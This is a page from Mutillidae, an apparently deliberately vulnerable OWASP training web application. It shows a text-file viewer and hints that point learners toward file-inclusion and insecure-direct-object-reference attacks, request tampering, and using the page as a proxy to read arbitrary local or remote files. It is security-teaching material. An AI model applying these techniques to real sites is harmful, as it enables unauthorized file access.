Mutillidae: Born to be Hacked
Version: 2.1.19 Not Logged In
Home Login/Register Toggle Security Reset DB View Log View Captured Data

OWASP
Site hacked...err...quality-tested with Samurai WTF, Backtrack, Firefox, Burp-Suite, Netcat, and these Mozilla Add-ons
 
 
 
 
Developed by Adrian "Irongeek" Crenshaw and Jeremy Druin
Hacker Files of Old
Take the time to read some of these great old school hacker text files.
Just choose one form the list and submit.
Text File Name
For other great old school hacking texts, check out http://www.textfiles.com/.
Hints
  • For Malicious File Execution/Insecure Direct Object Reference: Hum, looks like I'm grabbing files from another site. Could we use this as a proxy? Tip: Try the Tamper Data FireFox plugin or maybe Paros Proxy.
  • I wonder what the traffic generated by this page looks like? Wireshark is a good tool to examine network traffic.
  • Some code contains naive protections such as limiting the width of HTML fields. If your If you find that you need more room, try using a tool like Firebug to change the size of the field to be as long as you like. As you advance, try using tools like netcat to make your own POST requests without having to use the login web page at all.
  • You can use a page normally but then simply change the parameters is Tamper Data. Because Tamper Data is allowing the user to manipulate the request after the request has left the browser, any HTML or JavaScript has already run and is completely useless as a security measure. Any use of HTML or JavaScript for security purposes is useless anyway. Some developers still fail to recognize this fact to this day.
  • So if this page is grabbing files, loading them, then displaying there contents, is it possible to use this page to grab any HTML file from any site?
  • There is nothing special about HTML files except their format. Functions that load files usually do not care about the files contents. (An exception might be .NET Framework's MSXML.loadfile() which is simply a shortcut function to both load and parse XML in one call.) If the loader doesn't care what it loads, could this page be used to load any arbitrary file? Do the files have to be remote or could they be local?